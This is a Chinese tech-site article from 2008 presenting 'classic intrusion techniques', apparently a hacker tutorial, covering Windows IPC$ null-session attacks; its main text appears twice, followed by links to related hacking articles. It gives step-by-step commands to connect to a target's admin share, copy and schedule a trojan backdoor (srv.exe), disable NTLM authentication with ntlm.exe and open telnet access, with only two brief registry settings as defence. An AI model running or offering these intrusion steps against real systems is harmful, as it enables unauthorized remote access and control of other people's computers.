黑客在线之经典入侵技术总结 (一)
互联网 发布时间:2008-10-08 19:36:58 作者:佚名
我要评论
简 介
在网入侵中,我总结一下,以下几种常见漏洞入方法和补久措施。By:啤酒盖 相传,在神奇的网络世界中,有一群习惯了昼伏夜出的人,他们崇尚自由,反对收费,不变的信念是共享,在那群人眼中,众生皆平等,也没有什么坚不可破的城墙,他们就是——黑客!
简 介
在网入侵中,我总结一下,以下几种常见漏洞入方法和补久措施。By:啤酒盖 相传,在神奇的网络世界中,有一群习惯了昼伏夜出的人,他们崇尚自由,反对收费,不变的信念是共享,在那群人眼中,众生皆平等,也没有什么坚不可破的城墙,他们就是——黑客!今天我们把黑客经常用到的经典入侵技术与大家共享! 一、 永恒的IPC$ 入侵难度:★★★(中等) 存在范围:★★★(中等) 危险指数:★★★★★(很高) 使用几率:★★★★★(很高) 好用指数:75% 编辑部评审意见: 众所周知,安全问题是一个极具时效的问题,就拿两年前百试不爽的.printer溢出和unicode来说吧,在本年度基本上就没怎么再见有还用! 然而似乎也有例外,针对IPC$问题的攻击就常用常新。 什么是IPC$漏洞: IPC$是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和查看计算机的共享资源时使用。利用默认的IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的用户列表。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行 密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。 攻击工具: 扫描软件:流光4.71 木马软件:srv.exe 简单攻击: 1. 打开流光4.71 2. 进行扫描前的设置 3. 假设扫出127.0.0.1存在ipc$漏洞,我们进行如下操作 C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" //这是用流光扫到的密码 C:\>copy srv.exe $">\\127.0.0.1\admin$ //先复制srv.exe上去,在流光的Tools目录就有 出现如下提示: c:\winnt\system32\ 已复制 1 个文件 C:\>net time \\127.0.0.1 //查时间,这里的时间是指对方计算机的,也就是我们要入侵的127.0.0.1的时间,还有要提醒大家要注意的一点是,请把时间转换为24小时制 C:\>at \\127.0.0.1 11:05 srv.exe //用at命令启动srv.exe C:\>net time \\127.0.0.1 //再查查够时间没有 C:\>telnet 127.0.0.1 99 //我们telnet吧,注意端口是99,因为这里我们用的是srv.exe。 C:\>copy ntlm.exe $">\\127.0.0.1\admin$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上,在流光的tools目录有 C:\WINNT\system32>ntlm //运行,破坏对方机器的ntlm验证模式,使我们能通过直接连接对方的telnet模式。 C:\WINNT\system32> C:\WINNT\system32>net start telnet //然后直接用net start telnet启动telnet Telnet 服务器正在启动. Telnet 服务器已经启动成功。 \ C //成功 这时我们就可以直接使用TELNET 127.0.0.1连接对方了。 至此入侵结束。 如何防御: 1. 禁止建立空连接 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] RestrictAnonymous = DWORD:00000001 2. 禁止管理共享 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] AutoShareServer = DWORD:00000000
在网入侵中,我总结一下,以下几种常见漏洞入方法和补久措施。By:啤酒盖 相传,在神奇的网络世界中,有一群习惯了昼伏夜出的人,他们崇尚自由,反对收费,不变的信念是共享,在那群人眼中,众生皆平等,也没有什么坚不可破的城墙,他们就是——黑客!今天我们把黑客经常用到的经典入侵技术与大家共享! 一、 永恒的IPC$ 入侵难度:★★★(中等) 存在范围:★★★(中等) 危险指数:★★★★★(很高) 使用几率:★★★★★(很高) 好用指数:75% 编辑部评审意见: 众所周知,安全问题是一个极具时效的问题,就拿两年前百试不爽的.printer溢出和unicode来说吧,在本年度基本上就没怎么再见有还用! 然而似乎也有例外,针对IPC$问题的攻击就常用常新。 什么是IPC$漏洞: IPC$是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和查看计算机的共享资源时使用。利用默认的IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的用户列表。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行 密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。 攻击工具: 扫描软件:流光4.71 木马软件:srv.exe 简单攻击: 1. 打开流光4.71 2. 进行扫描前的设置 3. 假设扫出127.0.0.1存在ipc$漏洞,我们进行如下操作 C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" //这是用流光扫到的密码 C:\>copy srv.exe $">\\127.0.0.1\admin$ //先复制srv.exe上去,在流光的Tools目录就有 出现如下提示: c:\winnt\system32\ 已复制 1 个文件 C:\>net time \\127.0.0.1 //查时间,这里的时间是指对方计算机的,也就是我们要入侵的127.0.0.1的时间,还有要提醒大家要注意的一点是,请把时间转换为24小时制 C:\>at \\127.0.0.1 11:05 srv.exe //用at命令启动srv.exe C:\>net time \\127.0.0.1 //再查查够时间没有 C:\>telnet 127.0.0.1 99 //我们telnet吧,注意端口是99,因为这里我们用的是srv.exe。 C:\>copy ntlm.exe $">\\127.0.0.1\admin$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上,在流光的tools目录有 C:\WINNT\system32>ntlm //运行,破坏对方机器的ntlm验证模式,使我们能通过直接连接对方的telnet模式。 C:\WINNT\system32> C:\WINNT\system32>net start telnet //然后直接用net start telnet启动telnet Telnet 服务器正在启动. Telnet 服务器已经启动成功。 \ C //成功 这时我们就可以直接使用TELNET 127.0.0.1连接对方了。 至此入侵结束。 如何防御: 1. 禁止建立空连接 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] RestrictAnonymous = DWORD:00000001 2. 禁止管理共享 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] AutoShareServer = DWORD:00000000
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06



最新评论